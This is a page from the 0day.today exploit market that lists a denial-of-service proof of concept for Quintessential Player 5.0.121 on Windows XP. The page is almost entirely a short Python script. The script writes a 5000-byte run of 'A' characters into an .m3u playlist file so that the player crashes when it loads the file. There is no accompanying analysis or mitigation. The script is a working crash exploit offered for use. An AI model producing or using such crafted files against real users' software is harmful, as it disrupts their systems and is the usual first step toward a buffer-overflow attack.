[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Quintessential Player 5.0.121 Denial of Service

Author
Abhishek Lyall
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13629
Category
dos / poc
Date add
09-08-2010
Platform
windows
===============================================
Quintessential Player 5.0.121 Denial of Service
===============================================

#vulnerble application link http://www.quinnware.com/downloads.php
#tested on XP SP2/3
#author abhishek lyall - abhilyall[at]gmail[dot]com
#web::: http://aslitsecurity.com  Blog::: http://aslitsecurity.blogspot.com
#!/usr/bin/python
 
filename = "Quintessential.m3u"
 
 
junk = "\x41" * 5000
 
textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()



#  0day.today [2024-09-29]  #